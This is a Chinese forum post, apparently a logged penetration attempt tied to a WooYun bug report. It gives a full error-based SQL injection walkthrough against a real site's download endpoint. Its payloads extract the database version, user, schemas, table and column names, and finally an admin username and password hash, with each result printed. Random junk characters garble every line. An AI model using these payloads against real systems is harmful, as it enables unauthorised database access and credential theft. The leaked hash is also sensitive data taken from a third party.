http://www.wooyun.org/bugs/wooyun-2010-01666. C! w9 s S1 A' Q( y5 O4 e
8 b. m3 Q* K+ n7 M, m
之前想找个测试 没想到这有 可以测试下做个记录而已 & X3 m! @+ a0 w B* A: ^
4 Y. i6 i- M5 U& X" c3 h, H
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
' [$ q) x' r3 b% k& j. X6 ]! G2 ^1 z* n+ V% i! Z; k
/data0/htdocs/leqi_new/app/myapp.php$ v4 f( W" }- E4 h8 M
5 }( i2 E9 ]* ~% c8 I+ k
或者" ~& u3 Q$ O# F+ I; i+ |
& P9 c0 {+ N; C2 X/ ~# g
/**********version()**********/ 5.1.49-log' S# P, \. C: Z; L2 \$ M" J
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003. U& |' P0 x" O
# l* W% z5 o% A9 h! W
/**********user()**********/
6 ?" r3 \1 }: K6 y$ R2 e$ Uhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/ t/ e& j9 |3 [% A
. I' L+ r6 N8 x" _/**********database()**********/ leqi! l: \9 N T0 u, x$ |, l
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
7 P7 I1 v* f7 j2 X" ^3 S5 j- H! G/ Q7 {. k2 X: ?6 r, y @
/**********limit依次递归爆库**********/- b' K; _0 ^. Z( V L) q
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
$ O) N2 ~. E7 R5 [; cinformation_schema
( ]1 g6 d: o2 T; v6 |& z) `/ ahttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
. p+ O7 D0 G) b+ dleqi D7 N- }7 n- A+ q3 r
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0032 z0 U7 Q' ?0 t: u% D5 W$ ~
test
I8 [8 t7 r3 f
/ t' S! w3 o B. [/**********limit依次递归爆表名**********/, I0 A: K9 \& C9 b$ l* x
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
o6 U: N% d4 P6 E- K- nusers3 c) q' E. l# V: J9 C/ z
! n- M. A! Y* v6 i+ q1 Q" g
/**********limit依次递归爆字段名**********/
8 R* f1 c. {3 R' Q. hhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003" T/ e* f, o7 h# x) u$ E' T
user_id,username,nickname,passwd,group_id
: y1 W* f# L4 ^3 M! uhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23% ^0 {0 s0 {+ D6 Q
/wapc/5000_0005_0033 M! q; y9 c8 T6 G R8 [1 T2 x! ?2 c
11 219 r# ?, d1 _) j2 d P0 g
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
# p6 g, o, {2 j/ ?3 O/wapc/5000_0005_003
; k2 S# B( r9 L11 341 351 361
. ~! V W0 p8 A9 B5 y0 e/**********爆数据**********/
# E; e- o8 R ]6 h2 [http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%236 h4 C& t Q" p# A& Q
admin
0 V% ]: f' i3 i$ Nhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%235 R( a. Y: ]4 \! Z9 X! l, e4 l' x' R
6a8b4574ca231eb8bd52764d4978ffcd
2 a, _) q: k+ p- w! J) s8 \, y+ u$ _% y: w
" [' \* z& k' o3 D3 Q8 y
|